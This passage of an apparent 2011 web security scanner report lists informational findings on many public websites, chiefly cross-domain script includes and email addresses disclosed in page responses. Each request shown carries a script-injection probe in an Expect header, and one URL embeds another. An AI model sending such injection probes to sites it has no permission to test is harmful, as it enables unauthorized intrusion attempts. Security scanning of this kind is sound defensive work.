Confidence:	Certain
Host:	http://www.tonzr.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tonzr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404
Server: nginx
Date: Fri, 01 Apr 2011 16:19:26 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 9676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Special thanks to jQue
...[SNIP]...
<link rel="shortcut icon" type="image/ico" href="http://www.tonzr.com/favicon.png" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

12.98. http://www.wkyt.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wkyt.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400
http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wkyt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: sj-c14-r2-u1
Content-Type: text/html;charset=utf-8
Date: Fri, 01 Apr 2011 15:57:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 45060

<script type="text/javascript">

</script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-
...[SNIP]...
</script>
<script src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400" type="text/javascript" language="javascript1.3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

12.99. http://www.wndu.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wndu.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400
http://edge.quantserve.com/quant.js
http://gray.ftp.clickability.com/wnduwebftp/weather/ksbn_js_array.js
http://wp.myweather.net/wxdata/sticker.asp?pub=s114

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wndu.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: sj-c14-r7-u31-b5
Content-Type: text/html;charset=utf-8
Date: Fri, 01 Apr 2011 16:53:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
X-N: S
Content-Length: 50893

<script type="text/javascript">

</script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/199
...[SNIP]...
</script>
<script src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400" type="text/javascript" language="javascript1.3"></script>
...[SNIP]...


<script type="text/javascript" src="http://gray.ftp.clickability.com/wnduwebftp/weather/ksbn_js_array.js"></script>
...[SNIP]...
<div id="wndu_mw_cc" onmouseover="wndu_show_cc_popup();" onmouseout="wndu_hide_cc_popup_request();">
<SCRIPT LANGUAGE="JavaScript" SRC="http://wp.myweather.net/wxdata/sticker.asp?pub=s114"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

12.100. http://www.wsaz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wsaz.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400
http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wsaz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: dv-c1-r2-u24-b2
Content-Type: text/html;charset=utf-8
Date: Fri, 01 Apr 2011 16:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
X-N: S
Content-Length: 43464

<script type="text/javascript">

</script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/1999/RE
...[SNIP]...
</script>
<script src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=200806280400" type="text/javascript" language="javascript1.3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

13. Email addresses disclosed previous next
There are 38 instances of this issue:

http://investor.infospaceinc.com/phoenix.zhtml
http://s.meebocdn.net/cim/script/meebo_cim_v88_cim_9_4_6.js
http://www.163.com/favicon.ico
http://www.amatura.com/favicon.ico
http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
http://www.atmovs.com/favicon.ico
http://www.cambridge.org/contacts/
http://www.cambridge.org/uk/404_error.asp
http://www.cambridge.org/uk/catalogue/viewBasket.asp
http://www.cappex.com/favicon.ico
http://www.car-part.com/favicon.ico
http://www.colorado.edu/favicon.ico
http://www.conceptcarz.com/favicon.ico
http://www.dailydealfetcher.com/Theme/js/jquery.cookie.js
http://www.dmvnow.com/exec/common/textsizer.js
http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
http://www.family-pics.net/favicon.ico
http://www.fender.com/favicon.ico
http://www.fueleconomy.gov/favicon.ico
http://www.imapcast.com/favicon.ico
http://www.infospaceinc.com/contactus.aspx
http://www.metapress.com/favicon.ico
http://www.my-junior-sister.net/favicon.ico
http://www.mycountdown.org/favicon.ico
http://www.net-temps.com/favicon.ico
http://www.noaawatch.gov/favicon.ico
http://www.outspark.com/favicon.ico
http://www.overtons.com/favicon.ico
http://www.palomar.edu/favicon.ico
http://www.progressiveagent.com/favicon.ico
http://www.quartalflife.com/favicon.ico
http://www.quickyellow.com/scripts/v3/js/jquery.colorbox-min.js
http://www.stvid.com/favicon.ico
http://www.ucsc.edu/favicon.ico
http://www.viagra.com/common/js/lib/s_code.js
http://www.viagra.com/common/swf/js/s_code.js
http://www.wsaz.com/favicon.ico

13.1. http://investor.infospaceinc.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.infospaceinc.com
Path:	/phoenix.zhtml

Issue detail

The following email address was disclosed in the response:

ir@infospace.com

Request

Response

13.2. http://s.meebocdn.net/cim/script/meebo_cim_v88_cim_9_4_6.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.meebocdn.net
Path:	/cim/script/meebo_cim_v88_cim_9_4_6.js

Issue detail

The following email address was disclosed in the response:

ad-feedback@meebo-inc.com

Request

GET /cim/script/meebo_cim_v88_cim_9_4_6.js HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "1077749926"
Last-Modified: Tue, 17 Aug 2010 19:44:41 GMT
Server: lighttpd/1.4.19
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=125299
Expires: Sun, 03 Apr 2011 05:05:36 GMT
Date: Fri, 01 Apr 2011 18:17:17 GMT
Content-Length: 592369
Connection: close

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<a href="mailto:ad-feedback@meebo-inc.com?subject='+encodeURIComponent("Comment about: "+this.m_ad.getProp("share"))+'" class="meebo-238">
...[SNIP]...

13.3. http://www.163.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.163.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

cdnsupport@chinanetcenter.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.163.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: Cdn Cache Server V2.0
Date: Fri, 01 Apr 2011 15:36:15 GMT
Content-Type: text/html
Content-Length: 1681
Expires: Fri, 01 Apr 2011 15:36:15 GMT
X-Via: 1.0 dg53:8104 (Cdn Cache Server V2.0)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<TITLE>.......
...[SNIP]...
<A HREF="mailto:cdnsupport@chinanetcenter.com">cdnsupport@chinanetcenter.com</A>
...[SNIP]...

13.4. http://www.amatura.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amatura.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amatura.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:54:22 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
Content-Length: 525
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@advancedhosters.com">
...[SNIP]...

13.5. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The following email address was disclosed in the response:

nerdgirl@androidtapp.com

Request

Response

13.6. http://www.atmovs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atmovs.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.atmovs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 15:35:31 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 496

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

13.7. http://www.cambridge.org/contacts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/contacts/

Issue detail

The following email addresses were disclosed in the response:

asia@cambridge.org
capetown@cambridge.org
india@cambridge.org
information@cambridge.org
madrid@cambridge.org
melbourne@cambridge.org
newyork@cambridge.org
saopaulo@cambridge.org

Request

GET /contacts/ HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABDSSSR=KCLAEEPCNJAMKMPJHPPHKMKP; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.1.10.1301681613

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 15945
Date: Fri, 01 Apr 2011 18:13:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
...[SNIP]...
<a href="mailto:information@cambridge.org">information@cambridge.org</a>
...[SNIP]...
<a href="mailto:madrid@cambridge.org">madrid@cambridge.org</a>
...[SNIP]...
<a href="mailto:capetown@cambridge.org">capetown@cambridge.org</a>
...[SNIP]...
<a href="mailto:newyork@cambridge.org">newyork@cambridge.org</a>
...[SNIP]...
<a href="mailto:saopaulo@cambridge.org">saopaulo@cambridge.org</a>
...[SNIP]...
<a href="mailto:asia@cambridge.org">asia@cambridge.org</a>
...[SNIP]...
<a href="mailto:melbourne@cambridge.org">melbourne@cambridge.org</a>
...[SNIP]...
<a href="mailto:india@cambridge.org">india@cambridge.org</a>
...[SNIP]...

13.8. http://www.cambridge.org/uk/404_error.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/404_error.asp

Issue detail

The following email addresses were disclosed in the response:

directcustserve@cambridge.org
educustserve@cambridge.org
journals_subscriptions@cambridge.org
westeurope@cambridge.org

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8378
Date: Fri, 01 Apr 2011 18:16:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<a href="mailto:directcustserve@cambridge.org">directcustserve@cambridge.org</a>
...[SNIP]...
<a href="mailto:educustserve@cambridge.org">educustserve@cambridge.org</a>
...[SNIP]...
<a href="mailto:westeurope@cambridge.org">westeurope@cambridge.org</a>
...[SNIP]...
<a href="mailto:journals_subscriptions@cambridge.org">journals_subscriptions@cambridge.org</a>
...[SNIP]...

13.9. http://www.cambridge.org/uk/catalogue/viewBasket.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/catalogue/viewBasket.asp

Issue detail

The following email address was disclosed in the response:

directcustserve@cambridge.org

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8753
Date: Fri, 01 Apr 2011 18:16:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Cambr
...[SNIP]...
<a href="mailto:directcustserve@cambridge.org">directcustserve@cambridge.org</a>
...[SNIP]...

13.10. http://www.cappex.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cappex.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

support@cappex.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cappex.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:31:35 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 509
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:support@cappex.com">
...[SNIP]...

13.11. http://www.car-part.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.car-part.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@car-part.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.car-part.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 15:44:28 GMT
Server: Apache
Content-Length: 499
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@car-part.com">
...[SNIP]...

13.12. http://www.colorado.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.colorado.edu
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@www.colorado.edu

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colorado.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:42:04 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 487

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@www.colorado.edu">
...[SNIP]...

13.13. http://www.conceptcarz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.conceptcarz.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

pvj67@hotmail.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.conceptcarz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "pvj67@hotmail.com" on "2004.11.08T19:02-0500" exp "2005.11.08T12:00-0500" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:04:39 GMT

13.14. http://www.dailydealfetcher.com/Theme/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailydealfetcher.com
Path:	/Theme/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /Theme/js/jquery.cookie.js HTTP/1.1
Host: www.dailydealfetcher.com
Proxy-Connection: keep-alive
Referer: http://www.dailydealfetcher.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=4jlhuf45w235xt55xoqysh3n; Deals_UserPreferences=Email=&MarketID=13

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 16 Jun 2010 21:55:36 GMT
Accept-Ranges: bytes
ETag: "03c86a69edcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:10 GMT
Content-Length: 4296

.../**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

13.15. http://www.dmvnow.com/exec/common/textsizer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/exec/common/textsizer.js

Issue detail

The following email address was disclosed in the response:

txkang.REMOVETHIS@hotmail.com

Request

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:11:55 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:11:55 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 10 Jun 2009 14:51:00 GMT
ETag: "0e263dedae9c91:7c8"
Content-Length: 1332

/*------------------------------------------------------------
   Document Text Sizer- Copyright 2003 - Taewook Kang. All rights reserved.
   Coded by: Taewook Kang (txkang.REMOVETHIS@hotmail.com)
   Web Site: http://txkang.com
   Script featured on Dynamic Drive (http://www.dynamicdrive.com)

   Please retain this copyright notice in the script.
   License is granted to user to reuse this code
...[SNIP]...

13.16. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The following email address was disclosed in the response:

support@freecause.com

Request

Response

13.17. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

Issue detail

The following email address was disclosed in the response:

arfie@dogpile.com

Request

Response

13.18. http://www.family-pics.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.family-pics.net
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.family-pics.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:12:55 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10
Content-Type: text/html; charset=iso-8859-1
Content-Length: 501

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

13.19. http://www.fender.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fender.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@fender.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fender.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:webmaster@fender.com">webmaster@fender.com</a>
...[SNIP]...

13.20. http://www.fueleconomy.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fueleconomy.gov
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

k73@ornl.gov

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fueleconomy.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "k73@ornl.gov" on "2009.07.21T22:53-0400" exp "2010.07.21T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "k73@ornl.gov" on "2009.07.21T22:53-0400" exp "2010.07.21T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "k73@ornl.gov" on "2009.07.21T22:53-0400" exp "2010.07.21T12:00-0400" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "k73@ornl.gov" on "2009.07.21T22:53-0400" exp "2010.07.21T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "k73@ornl.gov" on "2009.07.21T22:53-0400" exp "2010.07.21T12:00-0400" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "k73@ornl.gov" on "2009.07.21T22:53-0400" exp "2010.07.21T12:00-0400" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:11:50 GMT

13.21. http://www.imapcast.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imapcast.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

operations@wdtinc.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imapcast.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:41:40 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 514
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:operations@wdtinc.com">
...[SNIP]...

13.22. http://www.infospaceinc.com/contactus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
